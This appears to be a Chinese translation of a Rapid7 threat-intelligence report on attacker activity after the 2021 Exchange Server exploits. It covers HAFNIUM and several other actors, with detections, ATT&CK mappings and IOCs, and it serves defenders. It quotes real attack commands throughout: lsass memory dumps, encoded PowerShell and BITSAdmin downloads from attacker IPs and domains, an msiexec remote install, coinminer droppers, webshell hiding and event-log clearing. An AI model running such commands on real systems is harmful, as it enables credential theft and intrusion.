微软Exchange漏洞攻击者行为分析
最近几周,想必大家都有听过有关于HAFNIUM组织攻击利用Microsoft’s Exchange Server漏洞的报道。这些漏洞的反响如此广范主要原因之一是因为,它们允许攻击者直接从公共互联网进入到受害者系统,接管受害主机的SYSTEM权限用户并执行操作。
由于此服务在默认情况下以最高级别的权限运行,因此应该对其进行加固并接收其他级别的管控。这种默认配置没有使用最小特权的原则,并且由于创建这些web应用程序的目的是向公共internet公开,并且不受诸如网络访问控制列表之类的其他基本方法的保护,因此会变得更加危险。除此之外,这些易受攻击的服务器还提供内部整个组织大量用户哈希/密码和电子邮件收件箱内容的直接访问途径。这通常也是攻击者在受害者环境中追求的最直接的方法之一。
虽然公布了一些已被利用的系统报告,为一部分人敲响了警钟,但在信息安全行业中,这种apt事件已经被许多人“盯梢”了多年。不同类型的攻击者都在频繁地寻求利用受害者向公共互联网提供的网络服务。通常,这些服务位于各种边缘设备上,这些设备是专门设计用来放置并向公共internet公开的。这可能会带来许多挑战,因为这些边界业务可能是设备、防火墙或不支持运行额外的安全相关软件(如端点检测和响应)的其他设备。这些设备通常也不属于标准的补丁管理系统。据Rapid7了解,现在从漏洞披露到产生可大规模利用的漏洞工具的速度有所提高,这使得受害者几乎没有时间测试和部署补丁,且受害者也不能随时对提供关键任务服务的系统进行变更控制。
在过去的几年中,Rapid7观察到一些不同的攻击者试图快速直接访问受害者的系统,以收集密码、执行加密劫持、分发勒索软件和/或窃取数据。攻击者通常会将目标锁定在组织的特定高级成员或员工的邮箱中,研究他们感兴趣且敏感的主题内容上。这些攻击者用来获得受害人信息的最简单的方法是通过远程桌面协议向公共internet提供远程访问服务的系统进行简单的密码喷射攻击。更“机智”的攻击者利则用了像Citrix Netscaler、Progress公司的Telerik和Pulse Secure公司的Pulse Connect Secure等最近出现的漏洞,仅做举例。
虽然对于如何进入受害者的网络的方法可能不同,从互联网可访问服务的各种攻击类型到网络钓鱼,同一种攻击方式攻击者可以保持多年内不变。原因是,在受害者的系统内本身存在的缺陷很少有人认真关注,它们一直对攻击者非常有效。继续采用使用操作系统中预先存在的实用程序的“就地生存”技术,使得防病毒或应用程序控制都不太可能捕捉和阻拦攻击者。此外,对于攻击者来说,这还可以释放或减少对开发漏洞利用程序和工具集的技术资源的需求。
因为攻击者的动作和行为可以长时间维持不变,Rapid7威胁情报和检测工程(TIDE)团队不断与我们的检测和响应管理安全操作中心以及事件响应团队持续合作,以开发和更新我们InsightIDR对攻击者的行为分析,确保所有的客户可及时了解攻击者采用的最新的策略,技术和程序。这使无论攻击者是否利用的是未知漏洞,我们的客户都可以收到有关攻击者行为的警报,并确保他们的业务安全。
最后,非常重要的是不要单纯的以为只有一个攻击者在利用这些新的漏洞。很有可能它是个“多人运动”在同时利用相同的弱点,并伴随有各种不同类型的后续渗透。在没有确凿证据的情况下,宣称它们之间存在联系充其量也只是是一种推测。
Tips_:_以低权限帐户运行是一种很好的安全做法,因为这样一来,恶意用户就不能利用软件漏洞来接管整个系统。
HAFNIUM都干了啥
过使用我们现有的检测,Rapid7观察到有攻击者使用China Chopper 攻击了9个不同的受害者,其中包括制造业、医疗保健、公用事业提供商等。这种攻击行为与HAFNIUM的行为有很大重叠,Rapid7的Insight Agent从2021年2月27日至2021年3月7日收集的数据中就观察到了这种行为。应该注意的是,攻击者使用客户端通过ChinaChopper 生成过程的方式至少自2013年以来几乎没有改变。这些命令行参数非常明显,在包含命令行参数的日志中很容易找到。这意味着根据这些模式开发的检测有可能有效寿命长达十年以上。
`Base64-decoded parameters z1 and z2:``z1=cmdz2=cd /d “c:\inetpub\wwwroot\”&whoami&echo [S]&cd&echo [E]`
资料来源:
https://www.fireeye.com/content/dam/fireeye-www/global/en/current-threats/pdfs/rpt-china-chopper.pdf
Rapid7基于此攻击者行为的审查开发了其他检测方法。我们注意到,默认情况下,当为Microsoft Exchange的Outlook Web Access配置IIS时,它有一个环境变量的值将设置为:
APP_POOL_ID=MSExchangeOWAAppPool
有了这些资料,再通过InsightAgent收集这些数据,并且能够使用InsightIDR的攻击者行为分析对其进行评估,TIDE团队能够编写一个检测模块,在执行任何进程时,只要子进程或父进程的环境变量和值与之匹配,就可以进行匹配告警。这使得我们不仅可以找到已知的China Chopper的用途,还可以找到其他几个攻击者是如何使用不同的技术利用此漏洞的。
攻击者使用ChinaChopper对lsass.exe进程执行MicrosoftSysinternals实用程序procdump64.exe,将其内存内容复制到磁盘上的文件中。这使攻击者以后可以使用诸如mimikatz之类的实用程序来检索和分析此内存转储,以从此过程的内存转储中提取密码。如果未采用双因素身份验证,则此攻击者有可能在以后的时间内再次使用这些受害者电子邮件帐户中的帐户信息。此外,即使在这些受害者位置实施了合理的密码更改策略,用户也经常会以可预测的方式轮换使用密码。例如,如果用户的密码为“ ThisIsMyPassword1!”,则在被迫更改时,他们可能只会将末尾的数字递增为“ ThisIsMyPassword2!”。这使攻击者可以轻松地根据人类行为的可预测性猜测未来的密码。
通过Rapid7的观察发现HAFNIUM执行过以下代码:
Procudmp.exe程序通过China Chopper webshell执行的命令,用于写入lsass.exe文件进程到磁盘:
`cmd /c cd /d C:\\root&procdump64.exe -accepteula -ma lsass.exe lsass.dmp&echo [S]&cd&echo [E]``cmd /c cd /d E:\\logs&procdump64.exe -accepteula -ma lsass.exe lsass.dmp&echo [S]&cd&echo [E]`
通过China Chopperwebshell执行侦察命令,以收集有关Active Directory域控制器、用户、系统和进程的信息:
`cmd /c cd /d "C:\\Program Files\\Microsoft\\Exchange Server\\V15\\FrontEnd\\HttpProxy\\owa\\auth&HOSTNAME" & nltest /dclist:<REDACTED_DOMAIN>&echo [S]&cd&echo [E]``cmd /c cd /d "C:\\Program Files\\Microsoft\\Exchange Server\\V15\\FrontEnd\\HttpProxy\\owa\\auth&nltest" /dclist:<REDACTED_DOMAIN>&echo [S]&cd&echo [E]``cmd /c cd /d "C:\\Program Files\\Microsoft\\Exchange Server\\V15\\FrontEnd\\HttpProxy\\owa\\auth&HOSTNAME" & whoami & nltest /dclist:<REDACTED_DOMAIN>&echo [S]&cd&echo [E]``cmd /c cd /d c:\\temp&tasklist&echo [S]&cd&echo [E]``cmd /c cd /d E:\\logs&tasklist &echo [S]&cd&echo [E]``cmd /c cd /d C:\inetpub\wwwroot\aspnet_client\system_web&net group "Domain computers" /do&echo [S]&cd&echo [E]``cmd /c cd /d C:\inetpub\wwwroot\aspnet_client\system_web&tasklist /v&echo [S]&cd&echo [E]`
进一步列举关于受害者系统中特定进程信息。进程smex_master.exe来自趋势科技的ScanMail, unsecapp.exe来自Microsoft Windows。
`cmd /c cd /d C:\inetpub\wwwroot\aspnet_client\system_web&wmic process where name=smex_master.exe get ExecutablePath,commandline&echo [S]&cd&echo [E]``cmd /c cd /d C:\inetpub\wwwroot\aspnet_client\system_web&wmic process where name=unsecapp.exe get ExecutablePath&echo [S]&cd&echo [E]``cmd /c cd /d C:\inetpub\wwwroot\aspnet_client\system_web&wmic process where name=unsecapp.exe get processid&echo [S]&cd&echo [E]`
使用通过ChinaChopper 执行的net.exe命令删除ActiveDirectory中的组:
cmd /c cd /d C:\\inetpub\\wwwroot\\aspnet_client\\system_web&net group "Exchange Organization administrators" administrator /del /domain&echo [S]&cd&echo [E]
通过China Chopper 执行网络连接检查和/或出口IP地址枚举命令:
`cmd /c cd /d "C:\\Program Files\\Microsoft\\Exchange Server\\V15\\FrontEnd\\HttpProxy\\owa\\auth&ping" -n 1 <REDACTED_HOSTNAME>&echo [S]&cd&echo [E]``cmd /c cd /d "C:\\Program Files\\Microsoft\\Exchange Server\\V15\\FrontEnd\\HttpProxy\\owa\\auth&ping" -n 1 <REDACTED_HOSTNAME>&echo [S]&cd&echo [E]``cmd /c cd /d C:\inetpub\wwwroot&ping -n 1 8.8.8.8&echo [S]&cd&echo [E]``cmd /c cd /d C:\inetpub\wwwroot\aspnet_client\system_web&c:\windows\temp\curl.exe -m 10 ipinfo.io&echo [S]&cd&echo [E]``cmd /c cd /d C:\inetpub\wwwroot\aspnet_client\system_web&c:\windows\temp\curl.exe -vv -k -m 10 https://www.google.com > C:\windows\temp\b.log 2>&1&echo [S]&cd&echo [E]``cmd /c cd /d C:\inetpub\wwwroot\aspnet_client\system_web&ping -n 1 ipinfo.io&echo [S]&cd&echo [E]``cmd /c cd /d C:\inetpub\wwwroot\aspnet_client\system_web&ping -n 1 www.google.com&echo [S]&cd&echo [E]``cmd /c cd /d c:\\temp&ping www.google.com&echo [S]&cd&echo [E]`
通过China Chopper 执行的第二阶段有效载荷检索命令:
cmd /c cd /d C:\\inetpub\\wwwroot\\aspnet_client&msiexec /q /i http://103.212.223.210:9900/nvidia.msi&echo [S]&cd&echo [E]
通过China Chopperwebshell执行的文件系统交互命令,用于搜索文件内容、隐藏和删除文件:
`\cmd /c cd /d C:\inetpub\wwwroot\aspnet_client\system_web&findstr Request "\\<REDACTED_HOSTNAME>\C$\Program Files\Microsoft\Exchange Server\V15\FrontEnd\HttpProxy\owa\auth\ErrorFF.aspx&echo" [S]&cd&echo [E]``cmd /c cd /d C:/inetpub/wwwroot/aspnet_client&attrib +h +s +r OutlookEN.aspx&echo [S]``cmd /c cd /d C:/inetpub/wwwroot/aspnet_client&attrib +h +s +r TimeoutLogout.aspx&echo [S]``cmd /c cd /d C:/inetpub/wwwroot/aspnet_client&del 'E:\Program Files\Microsoft\Exchange Server\V15\FrontEnd\HttpProxy\owa\auth\OutlookEN.aspx'&echo [S]``cmd /c cd /d C:/inetpub/wwwroot/aspnet_client&del 'E:\Program Files\Microsoft\Exchange Server\V15\FrontEnd\HttpProxy\owa\auth\TimeoutLogout.aspx'&echo [S]`
InsightIDR攻击者行为分析可检测此攻击者的活动:
-
可疑进程-Outlook Web Access生成的进程
-
攻击者技术-Net命令删除Exchange管理组
-
攻击者工具-China Chopper Webshell执行命令
-
攻击者技术-针对LSASS使用ProcDump
在与HAFNIUM有关的活动中观察到的MITRE ATT&CK 技术
-
T1003 - 操作系统凭据倾销
-
T1003.001 - 操作系统凭据倾销:LSASS 内存_https://attack.mitre.org/techniques/T1003/001/_
-
T1005 - 来自本地系统的数据
-
T1007 - 系统服务发现
-
T1033 - 系统所有者/用户发现
-
T1041 - 通过 C2 通道进行渗透
-
T1047 - 窗口管理仪器
-
T1057 - 过程发现
-
T1059 - 命令和脚本口译员
-
T1059.003 - 命令和脚本口译员:视窗命令外壳_https://attack.mitre.org/techniques/T1059/003/_
-
T1071 - 应用层协议
-
T1071.001 - 应用层协议:Web 协议
-
T1074 - 数据分阶段
-
T1074.001 - 数据分阶段:本地数据分期_https://attack.mitre.org/techniques/T1074/001/_
-
T1083 - 文件和目录发现
-
T1087 - 帐户发现
-
T1087.001 - 帐户发现:本地帐户
-
T1087.002 - 帐户发现:域名帐户
-
T1098 - 帐户操作
-
T1105 - 入口工具传输
-
T1190 - 利用面向公众的应用程序
-
T1203 - 开发客户执行
-
T1218 - 已签名的二进制代理执行
-
T1218.007 - 已签名的二进制代理执行:Msiexec
-
T1505 - 服务器软件组件
-
T1505.003 - 服务器软件组件:网络壳
-
T1518 - 软件发现
-
T1518.001 - 软件发现:安全软件发现
-
T1531 - 帐户访问删除
-
T1583 - 获取基础设施
-
T1583.003 - 获取基础设施:虚拟专用服务器_https://attack.mitre.org/techniques/T1583/003/_
-
T1587 - 开发功能
-
T1587.001 - 开发功能:恶意软件
-
T1587.004 - 开发功能:漏洞
-
T1588 - 获取功能
-
T1588.001 - 获取功能:恶意软件
-
T1588.002 - 获取功能:工具
-
T1588.005 - 获取功能:漏洞
-
T1588.006 - 获取功能:漏洞
-
T1595 - 主动扫描
-
T1595.001 - 主动扫描:扫描 IP 块
-
T1595.002 - 主动扫描:漏洞扫描
于HAFNIUM不相关的活动
Rapid7 还观察到除HAFNIUM之外的部分攻击者在最近几周对这些Exchange漏洞进行了其他几种不同类型后渗透攻击尝试。我们已将这些命令分组,并将会被执行的独特类型的命令提炼到如下所示的各个部分中。
Minidump 和 Makecab 攻击
发现此攻击者上传批量脚本来执行 Microsoft 实用程序 dsquery .exe以列举活动目录域中的所有用户。攻击者还可能将comsvcs.dll中的Minidump功能与rundll32.exe一起使用 以便将lsass.exe进程的内存写入磁盘。然后,攻击者使用现有的Microsoft实用程序makecab.exe压缩内存转储,以更有效地进行检索。总体而言,该攻击者在对受害者进行数据收集的过程中所利用的方法与其他报道该行为者的报告中讨论的数据相似,现将这些行为统称为HAFNIUM。但是,因为其所使用的工具、技术差异很大,因此如果没有其他引人注目的链接,就无法轻易将其归因于同一攻击者。
`C:\Windows\System32\cmd.exe /c c:\inetpub\wwwroot\aspnet_client\test.bat``C:\Windows\System32\cmd.exe /c c:\inetpub\wwwroot\aspnet_client\test.bat``dsquery * -limit 0 -filter objectCategory=person -attr * -uco``powershell rundll32.exe c:\windows\system32\comsvcs.dll MiniDump 900 c:\inetpub\wwwroot\aspnet_client\<REDACTED_33_CHARACTER_STRING>.tmp.dmp full``makecab c:\inetpub\wwwroot\aspnet_client\<REDACTED_33_CHARACTER_STRING>.tmp.dmp c:\inetpub\wwwroot\aspnet_client\<REDACTED_33_CHARACTER_STRING>.dmp.zip``makecab c:\inetpub\wwwroot\aspnet_client\<REDACTED_33_CHARACTER_STRING>.tmp c:\inetpub\wwwroot\aspnet_client\<REDACTED_33_CHARACTER_STRING>.dmp.zip`
用于检测此攻击者活动的InsightIDR攻击者行为分析:
-
可疑进程-Outlook WebAccess产生的进程
-
攻击者技术-通过COM Services DLL的Minidump
恶意DLL攻击
到该攻击者通过rundll32.exe上传和执行DLL,并将输出重定向到文本文件。人们相信demo.dll文件具有与mimikatz或其他哈希/密码转储实用程序类似的功能。攻击者还利用net,netstat和tasklist实用程序以及klist来显示缓存的Kerberos票证。这再次与HAFNIUM收集的数据类型有些重叠,但是这样做的方法不同。另外,这是攻击者通常都会采取的操作。
`c:\windows\system32\cmd.exe /c tasklist``tasklist``c:\windows\system32\cmd.exe /c net time /do``net time /do``c:\windows\system32\cmd.exe /c rundll32 c:\programdata\demo.dll,run -lm > c:\programdata\1.txt``rundll32 c:\programdata\demo.dll,run -lm > c:\programdata\1.txt``c:\windows\system32\cmd.exe /c klist``c:\windows\system32\cmd.exe /c tasklist``tasklist``c:\windows\system32\cmd.exe /c netstat -ano``netstat -ano`
InsightIDR攻击者行为分析检测这个攻击者的活动:
-
可疑进程-Outlook Web Access产生的进程
Opera浏览器和Cobalt Strike攻击
这个攻击者通过Microsoft的BITSAdmin下载脚本。然后,这些脚本将执行经过编码的PowerShell命令,检索可以匹配Opera浏览器最新版本漏洞的DLL (CVE-2018-18913)。攻击者还会检索恶意的dll和其他文件,并将其与合法的Opera_browser.exe文件放置在同一目录中以进行执行。然后,这会将恶意代码加载到与浏览器位于同一目录中的DLL中。最终再执行Cobalt Strike(攻击者分发勒索软件最常用的工具)。
`C:\Windows\System32\bitsadmin.exe /rawreturn /transfer getfile http://89.34.111.11/3.avi c:\Users\public\2.bat``C:\Windows\System32\cmd.exe /c c:\Users\public\2.bat``powershell -enc KABuAGUAdwAtAG8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcAA6AC8ALwA4ADYALgAxADAANQAuADEAOAAuADEAMQA2AC8AbgBlAHcAcwAvAGMAbwBkAGUAJwAsACcAQwA6AFwAdQBzAGUAcgBzAFwAcAB1AGIAbABpAGMAXABvAHAAZQByAGEAXABjAG8AZABlACcAKQA=``powershell -enc KABuAGUAdwAtAG8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcAA6AC8ALwA4ADYALgAxADAANQAuADEAOAAuADEAMQA2AC8AbgBlAHcAcwAvAG8AcABlAHIAYQBfAGIAcgBvAHcAcwBlAHIALgBwAG4AZwAnACwAJwBDADoAXAB1AHMAZQByAHMAXABwAHUAYgBsAGkAYwBcAG8AcABlAHIAYQBcAG8AcABlAHIAYQBfAGIAcgBvAHcAcwBlAHIALgBwAG4AZwAnACkA``powershell -enc KABuAGUAdwAtAG8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcAA6AC8ALwA4ADYALgAxADAANQAuADEAOAAuADEAMQA2AC8AbgBlAHcAcwAvAG8AcABlAHIAYQBfAGIAcgBvAHcAcwBlAHIALgBkAGwAbAAnACwAJwBDADoAXAB1AHMAZQByAHMAXABwAHUAYgBsAGkAYwBcAG8AcABlAHIAYQBcAG8AcABlAHIAYQBfAGIAcgBvAHcAcwBlAHIALgBkAGwAbAAnACkA``msiexec.exe -k``powershell Start-Sleep -Seconds 10``cmd /c C:\\users\\public\\opera\\opera_browser.exe``C:\\users\\public\\opera\\opera_browser.exe``powershell -enc KABuAGUAdwAtAG8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcAA6AC8ALwA4ADYALgAxADAANQAuADEAOAAuADEAMQA2AC8AbgBlAHcAcwAvAG8AcABlAHIAYQBfAGIAcgBvAHcAcwBlAHIALgBlAHgAZQAnACwAJwBDADoAXAB1AHMAZQByAHMAXABwAHUAYgBsAGkAYwBcAG8AcABlAHIAYQBcAG8AcABlAHIAYQBfAGIAcgBvAHcAcwBlAHIALgBlAHgAZQAnACkA`
传递给PowerShell的Base64解码的字符串:
`(new-object System.Net.WebClient).DownloadFile('http://86.105.18.116/news/code','C:\users\public\opera\code')``(new-object System.Net.WebClient).DownloadFile('http://86.105.18.116/news/opera_browser.png','C:\users\public\opera\opera_browser.png')``(new-object System.Net.WebClient).DownloadFile('http://86.105.18.116/news/opera_browser.dll','C:\users\public\opera\opera_browser.dll')``(new-object System.Net.WebClient).DownloadFile('http://86.105.18.116/news/opera_browser.exe','C:\users\public\opera\opera_browser.exe')`
用于检测此攻击者活动的InsightIDR攻击者行为分析:
-
可疑进程-Outlook Web Access产生的进程
-
攻击者技术-使用后台智能传输服务下载并执行
-
攻击者技术-URL传递给BitsAdmin
Six-character的webshell攻击
发现此攻击者上载了webshell并将其复制到webroot中的其他位置。
cmd /c copy C:\inetpub\wwwroot\aspnet_client\discover.aspx "C:\Program Files\Microsoft\Exchange Server\V15\FrontEnd\HttpProxy\owa\auth\<REDACTED_6_CHARACTER_STRING>.aspx"
用于检测此攻击者活动的InsightIDR攻击者行为分析:
-
可疑进程-Outlook Web Access产生的进程
从攻击源下载已编码的PowerShell
发现攻击者正在执行编码的PowerShell命令,该命令将从远程位置下载恶意软件。还会执行getmac.exe实用程序以枚举有关网络适配器的信息。
`cmd.exe /c powershell -ep bypass -e SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAOgAvAC8AcAAuAGUAcwB0AG8AbgBpAG4AZQAuAGMAbwBtAC8AcAA/AGUAJwApAA==``C:\Windows\system32\getmac.exe /FO CSV`
传递给PowerShell的Base64解码的字符串:
IEX (New-Object Net.WebClient).downloadstring('http://p.estonine.com/p?e')
用于检测此攻击者活动的InsightIDR攻击者行为分析:
-
可疑进程-Outlook Web Access产生的进程
-
攻击者技术-PowerShell下载
Ten-character的webshell攻击
发现此攻击者正在上载webshell,使用icacls将webroot的目录权限设置为递归只读。此外,攻击者使用attrib.exe实用工具将包含Web Shell的文件设置标记为隐藏,并设置系统更加难以查找这些文件。
`C:\Windows\System32\cmd.exe /c move "c:\Program Files\Microsoft\Exchange Server\V15\FrontEnd\HttpProxy\owa\auth\error.aspx" "c:\Program Files\Microsoft\Exchange Server\V15\FrontEnd\HttpProxy\owa\auth\<REDACTED_10_CHARACTER_STRING>.aspx"``C:\Windows\System32\cmd.exe /c icacls "c:\Program Files\Microsoft\Exchange Server\V15\FrontEnd\HttpProxy\owa\auth" /inheritance:r /grant:r Everyone:(OI)(CI)R``C:\Windows\System32\cmd.exe /c =attrib "c:\Program Files\Microsoft\Exchange Server\V15\FrontEnd\HttpProxy\owa\auth\<REDACTED_10_CHARACTER_STRING>.aspx" +s +h``attrib "c:\Program Files\Microsoft\Exchange Server\V15\FrontEnd\HttpProxy\owa\auth\<REDACTED_10_CHARACTER_STRING>.aspx" +s +h``C:\Windows\System32\cmd.exe /c icacls "c:\Program Files\Microsoft\Exchange Server\V15\FrontEnd\HttpProxy\ecp\auth" /inheritance:r /grant:r Everyone:(OI)(CI)R`
用于检测此攻击者活动的InsightIDR攻击者行为分析:
-
可疑进程-Outlook Web Access产生的进程
-
攻击者技术-修改Exchange Webroot中的文件
7zip和NetSupport Manager攻击
该攻击者使用了7zip压缩实用程序(重命名为MonitoringLog.exe)和NetSupport Manager远程访问工具(client32.exe)。这些实用程序很可能由PowerShell脚本script1.ps1检索,并位于名为Service.Information.rtf的受密码保护的存档中。提取后,将执行以下实用程序:
`c:\windows\system32\cmd.exe dir C:\Programdata\``c:\windows\system32\cmd.exe /c powershell C:\Programdata\script1.ps1``powershell C:\Programdata\script1.ps1``C:\ProgramData\MonitoringLog.exe x -p<REDACTED_STRING> -y C:\ProgramData\Service.Information.rtf -oC:\ProgramData``ping -n 10 127.0.0.1``c:\windows\system32\cmd.exe /c C:\Programdata\MonitoringLog.cmd``taskkill /Im rundll32.exe /F``C:\ProgramData\NetConnections\client32.exe``ping -n 10 127.0.0.1``taskkill /Im rundll32.exe /F``c:\windows\system32\cmd.exe /c tasklist /v``tasklist /v`
用于检测此攻击者活动的InsightIDR攻击者行为分析:
-
可疑进程-Outlook Web Access产生的进程
事件日志删除和虚拟目录创建攻击
该攻击者使用Microsoft实用程序appcmd.exe在现有Webroot中创建了虚拟目录,然后使用wevtutl.exe清除了系统上的所有事件日志:
`CMD C:\Windows\System32\inetsrv\appcmd.exe add vdir "/app.name:Default Web Site/" "/path:/owa/auth/ /zfwqn" /physicalPath:C:\ProgramData\COM\zfwqn`` ``CMD /c for /f %x in ('wevtutil el') do wevtutil cl %x``wevtutil el``wevtutil cl <REDACTED_ALL_DIFFERENT_EVENT_LOGS>`
用于检测此攻击者活动的InsightIDR攻击者行为分析:
-
可疑进程-Outlook Web Access产生的进程
-
攻击者技术-使用WEvtUtil清除事件日志
Webshell枚举攻击
发现攻击者正在执行编码的PowerShell命令,以使用type命令查看HAFNIUM和其他攻击者使用的名为Outlooken.aspx的可能的Webshell文件的内容。这可能是希望利用其他攻击者甚至研究人员在利用这些漏洞所建立的“后门程序”,简称前人栽树后人乘凉:
`cmd /c powershell -enc YwBtAGQALgBlAHgAZQAgAC8AYwAgACIAdAB5AHAAZQAgACIAIgBDADoAXABQAHIAbwBnAHIAYQBtACAARgBpAGwAZQBzAFwATQBpAGMAcgBvAHMAbwBmAHQAXABFAHgAYwBoAGEAbgBnAGUAIABTAGUAcgB2AGUAcgBcAFYAMQA1AFwARgByAG8AbgB0AEUAbgBkAFwASAB0AHQAcABQAHIAbwB4AHkAXABvAHcAYQBcAGEAdQB0AGgAXABvAHUAdABsAG8AbwBrAGUAbgAuAGEAcwBwAHgAIgAiACIA``cmd /c powershell -enc dAB5AHAAZQAgACIAQwA6AFwAUAByAG8AZwByAGEAbQAgAEYAaQBsAGUAcwBcAE0AaQBjAHIAbwBzAG8AZgB0AFwARQB4AGMAaABhAG4AZwBlACAAUwBlAHIAdgBlAHIAXABWADEANQBcAEYAcgBvAG4AdABFAG4AZABcAEgAdAB0AHAAUAByAG8AeAB5AFwAbwB3AGEAXABhAHUAdABoAFwAbwB1AHQAbABvAG8AawBlAG4ALgBhAHMAcAB4ACIA`
Base64解码字符串:
type "C:\Program Files\Microsoft\Exchange Server\V15\FrontEnd\HttpProxy\owa\auth\outlooken.aspx
InsightIDR攻击者行为分析检测这个攻击者的活动:
-
可疑进程- Outlook Web访问产生的进程
Coinminer dropper攻击
发现一些攻击者使用PowerShell来检索和执行coinminers。
`cmd.exe /c powershell.exe Invoke-WebRequest http://microsoftsoftwaredownload.com:8080/m103w.zip -OutFile C:\windows\temp\dsf.exe & C:\windows\temp\dsf.exe RS9+cn_0 & del C:\windows\temp\dsf.exe``powershell.exe Invoke-WebRequest http://microsoftsoftwaredownload.com:8080/m103w.zip -OutFile C:\windows\temp\dsf.exe``C:\windows\temp\dsf.exe RS9+cn_0`
多次使用以下位置检索的文件名(稍有不同的文件名):
`cmd.exe /c powershell.exe Invoke-WebRequest http://microsoftsoftwaredownload.com:8080/c103w-at.zip -OutFile C:\windows\temp\dsf.exe & C:\windows\temp\dsf.exe RS9+cn_0 & del C:\windows\temp\dsf.exe``powershell.exe Invoke-WebRequest http://microsoftsoftwaredownload.com:8080/c103w-at.zip``C:\windows\temp\dsf.exe RS9+cn_0`
用于检测此攻击者活动的InsightIDR攻击者行为分析:
-
可疑进程-Outlook Web Access产生的进程
简单侦察攻击
发现一些攻击者执行了非常简单的侦察命令,以收集有关Active Directory中的主机,进程,用户和系统的更多信息:
`net group /domain``net group "Domain Computers" /do``net group "Domain Users" /do``net group IntranetAdmins /do``net user /domain``systeminfo``tasklist`
另一个仅执行简单侦察类型命令的示例:
`whoami``systeminfo``systeminfo``wmic product get name``Wmic product get name`
用于检测此攻击者活动的InsightIDR攻击者行为分析:
-
可疑进程-Outlook WebAccess产生的进程
结论
虽然我们知道这些漏洞在外部已经可以被利用,但这似乎仅是几个动机和技能不同的攻击者所为。Rapid7甚至观察到在两周的时间内,多个不同的角色(HAFNIUM和coinminer drops)在对同一受害者进行攻击利用。一些攻击者利用此漏洞从受害者系统中收集了密码/哈希。这使他们能够从多个受害者收集数据,只要收集到的凭证保持不变,这些数据就允许他们访问Active Directory服务。
由于攻击者意识到自己的行为会被发现,并且漏洞将很快被修补,所以在这之前相关的凭证信息的传播可能已经达到一定的规模。即使系统已成功修补,这也有可能使这些攻击者继续访问这些帐户。具有HAFNIUM的特征的文件在后来出现了被他人所利用情况,这可能表明同一个漏洞已经被共享或者泄露。在撰写本文时,Rapid7尚无确切证据,并承认此陈述具有推测性。
通过继续分析攻击者在攻击后的行为以开发出检测程序,可以大大增加被通知漏洞的可能性。这与用于获得对受害环境的初始访问权限的方法无关。此外,与大多数其他折衷指标在其他类型的公共报告中共享的情况相比,这些检测的寿命更长,并且可以更及时地提供。
观察到攻击者使用的CVE:
Common Vulnerabilities and Exposure
Description
CVE-2018-18913
Opera Search Order Hijacking Vulnerability https://blog.lucideus.com/2019/02/opera-search-order-hijacking-cve-2018-18913.html
CVE-2021-26855
Microsoft Exchange Server remote code execution https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-26855
CVE-2021-26857
Microsoft Exchange Server remote code execution https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-26857
CVE-2021-26858
Microsoft Exchange Server remote code execution https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-26858
CVE-2021-27065
Microsoft Exchange Server remote code execution https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-27065
观察到的所有攻击者使用的IOCs:
Type
Value
FQDN
estonine.com
FQDN
p.estonine.com
FQDN
ipinfo.io
Filepath
C:\inetpub\wwwroot\aspnet_client\
Filepath
C:\inetpub\wwwroot\aspnet_client\system_web\
Filepath
C:\Program Files\Microsoft\Exchange Server\V15\Bin\
Filepath
c:\Program Files\Microsoft\Exchange Server\V15\FrontEnd\HttpProxy\ecp\auth\
Filepath
C:\Program Files\Microsoft\Exchange Server\V15\FrontEnd\HttpProxy\owa\auth\
Filepath
C:\Program Files\Microsoft\Exchange Server\V15\FrontEnd\HttpProxy\owa\auth\Current\themes\resources\
Filepath
C:\Programdata\
Filepath
C:\ProgramData\COM\zfwqn\
Filepath
C:\root\
Filepath
C:\Users\Public\
Filepath
C:\Users\Public\Opera\
Filepath
C:\Windows\temp\
Filename
1.txt
Filename
2.bat
Filename
3.avi
Filename
b.log
Filename
c103w-at.zip
Filename
client32.exe
Filename
code
Filename
curl.exe
Filename
demo.dll
Filename
discover.aspx
Filename
dsf.exe
Filename
error.aspx
Filename
ErrorFF.aspx
Filename
exshell.psc1
Filename
Flogon.aspx
Filename
lsass.dump
Filename
m103w.zip
Filename
nvidia.msi
Filename
opera_browser.dll
Filename
opera_browser.exe
Filename
opera_browser.png
Filename
OutlookEN.aspx
Filename
MonitoringLog.cmd
Filename
MonitoringLog.exe
Filename
p
Filename
procdump64.exe
Filename
Service.Information.rtf
Filename
TimeoutLogout.aspx
Filename
2.bat
Filename
script1.ps1
Filename
test.bat
IP Address
178.162.217.107
IP Address
178.162.203.202
IP Address
178.162.203.226
IP Address
85.17.31.122
IP Address
5.79.71.205
IP Address
5.79.71.225
IP Address
178.162.203.211
IP Address
85.17.31.82
IP Address
86.105.18.116
IP Address
198.98.61.152
IP Address
89.34.111.11
MD5
7a6c605af4b85954f62f35d648d532bf
MD5
e1ae154461096adb5ec602faad42b72e
MD5
b3df7f5a9e36f01d0eb0043b698a6c06
MD5
c60ac6a6e6e582ab0ecb1fdbd607705b
MD5
42badc1d2f03a8b1e4875740d3d49336
MD5
c515107d75563890020e915f54f3e036
SHA1
02886f9daa13f7d9855855048c54f1d6b1231b0a
SHA1
c7f68a184df65e72c59403fb135924334f8c0ebd
SHA1
